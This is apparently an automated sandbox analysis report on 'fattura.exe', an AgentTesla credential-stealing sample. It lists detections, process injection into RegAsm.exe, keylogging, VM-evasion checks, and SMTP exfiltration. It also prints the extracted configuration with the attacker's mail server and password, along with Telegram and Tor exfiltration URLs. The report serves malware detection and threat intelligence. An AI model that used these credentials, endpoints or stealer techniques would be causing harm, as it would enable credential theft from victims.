Play interactive tour

Edit tour

Analysis Report fattura.exe

Overview

General Information

Sample Name:	fattura.exe
Analysis ID:	321142
MD5:	ac16b512e9de9308fa69b78af1faed07
SHA1:	85eff7055833458712baa0facf48269317d38bff
SHA256:	2112f6c6abb4fe84e62fd5ff70f880413b3e54610535b1bd1e5d9ca64d6206f5
Tags:	AgentTesla
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Sigma detected: RegAsm connects to smtp port

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Installs a global keyboard hook

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Writes to foreign memory regions

Antivirus or Machine Learning detection for unpacked file

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

fattura.exe (PID: 3984 cmdline: 'C:\Users\user\Desktop\fattura.exe' MD5: AC16B512E9DE9308FA69B78AF1FAED07)

RegAsm.exe (PID: 2456 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

RegAsm.exe (PID: 864 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "wDrIkJ7y7Qr0a", "URL: ": "http://LoTLRwkC9qh4QyRRa.com", "To: ": "info.greatdeck@greatdeck.co", "ByHost: ": "mail.greatdeck.co:587", "Password: ": "yX93LyJE", "From: ": "info.greatdeck@greatdeck.co"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.663757971.00000000057F5000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.667877836.0000000004B03000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.669949286.00000000057F5000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.669771908.0000000005512000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.919344490.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: fattura.exe PID: 3984	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 864	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegAsm.exe PID: 864	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.fattura.exe.5510000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: RegAsm connects to smtp port

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 162.222.226.70, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 864, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49767

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: RegAsm.exe.864.2.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "wDrIkJ7y7Qr0a", "URL: ": "http://LoTLRwkC9qh4QyRRa.com", "To: ": "info.greatdeck@greatdeck.co", "ByHost: ": "mail.greatdeck.co:587", "Password: ": "yX93LyJE", "From: ": "info.greatdeck@greatdeck.co"}

Multi AV Scanner detection for submitted file

Show sources

Source: fattura.exe

ReversingLabs: Detection: 25%

Machine Learning detection for sample

Show sources

Source: fattura.exe

Joe Sandbox ML: detected

Source: 2.2.RegAsm.exe.400000.0.unpack

Avira: Label: TR/Spy.Gen8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49767 -> 162.222.226.70:587

Source: global traffic

TCP traffic: 192.168.2.4:49767 -> 162.222.226.70:587

Source: Joe Sandbox View

IP Address: 162.222.226.70 162.222.226.70

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: global traffic

TCP traffic: 192.168.2.4:49767 -> 162.222.226.70:587

Source: unknown

DNS traffic detected: queries for: mail.greatdeck.co

Source: RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	String found in binary or memory: http://Bvcujr.com
Source: RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: RegAsm.exe, 00000002.00000002.920893237.0000000002D98000.00000004.00000001.sdmp	String found in binary or memory: http://LoTLRwkC9qh4QyRRa.com
Source: RegAsm.exe, 00000002.00000002.920893237.0000000002D98000.00000004.00000001.sdmp	String found in binary or memory: http://LoTLRwkC9qh4QyRRa.comP
Source: RegAsm.exe, 00000002.00000002.920950784.0000000002DDA000.00000004.00000001.sdmp	String found in binary or memory: http://greatdeck.co
Source: RegAsm.exe, 00000002.00000002.920950784.0000000002DDA000.00000004.00000001.sdmp	String found in binary or memory: http://mail.greatdeck.co
Source: RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: fattura.exe, 00000000.00000003.663757971.00000000057F5000.00000004.00000001.sdmp, RegAsm.exe, 00000002.00000002.919344490.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: fattura.exe, 00000000.00000003.663757971.00000000057F5000.00000004.00000001.sdmp, RegAsm.exe, 00000002.00000002.919344490.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary:

Source: C:\Users\user\Desktop\fattura.exe	Code function: 0_2_05501C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,		0_2_05501C09
Source: C:\Users\user\Desktop\fattura.exe	Code function: 0_2_055000AD NtOpenSection,NtMapViewOfSection,		0_2_055000AD

Source: C:\Users\user\Desktop\fattura.exe	Code function: 0_2_00B8F419	0_2_00B8F419
Source: C:\Users\user\Desktop\fattura.exe	Code function: 0_2_02DE04F0	0_2_02DE04F0
Source: C:\Users\user\Desktop\fattura.exe	Code function: 0_2_02DE04E1	0_2_02DE04E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_02704EFA	2_2_02704EFA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0270C6D0	2_2_0270C6D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_02708F38	2_2_02708F38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_02704430	2_2_02704430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0270D8E0	2_2_0270D8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_027098B0	2_2_027098B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_02745EA8	2_2_02745EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_02745721	2_2_02745721
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_02746490	2_2_02746490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0274F518	2_2_0274F518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0274D900	2_2_0274D900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_027C8000	2_2_027C8000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_027CE198	2_2_027CE198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_027C0F53	2_2_027C0F53
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_027C9710	2_2_027C9710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_028746A0	2_2_028746A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_02874690	2_2_02874690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0287D301	2_2_0287D301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_05CD7538	2_2_05CD7538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_05CD94F8	2_2_05CD94F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_05CD6C68	2_2_05CD6C68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_05CD6920	2_2_05CD6920

Source: fattura.exe, 00000000.00000003.663757971.00000000057F5000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameKSNqaOSyHMGbBIJqcKRgjDNxy.exe4 vs fattura.exe
Source: fattura.exe, 00000000.00000002.667877836.0000000004B03000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameaQIZSnHIrbgAFuDP.bounce.exe4 vs fattura.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Section loaded: sfc.dll

Jump to behavior

Source: fattura.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@2/1

Source: C:\Users\user\Desktop\fattura.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fattura.exe.log

Jump to behavior

Source: fattura.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\fattura.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\fattura.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: fattura.exe

ReversingLabs: Detection: 25%

Source: unknown	Process created: C:\Users\user\Desktop\fattura.exe 'C:\Users\user\Desktop\fattura.exe'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Users\user\Desktop\fattura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: fattura.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: fattura.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_027017E8 push esp; ret	2_2_02701BFD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_02702A8D push es; ret	2_2_02702A9F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_02702B25 push es; ret	2_2_02702B27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0274B57F push edi; retn 0000h	2_2_0274B581

Source: initial sample

Static PE information: section name: .text entropy: 7.86592227679

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\fattura.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\fattura.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Window / User API: threadDelayed 768

Jump to behavior

Source: C:\Users\user\Desktop\fattura.exe TID: 6484	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1088	Thread sleep count: 768 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -58500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -84750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -56000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -81750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -54000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -78750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -101000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -48500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -94000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -46500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -43500s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -73000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -51750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320	Thread sleep time: -48750s >= -30000s	Jump to behavior
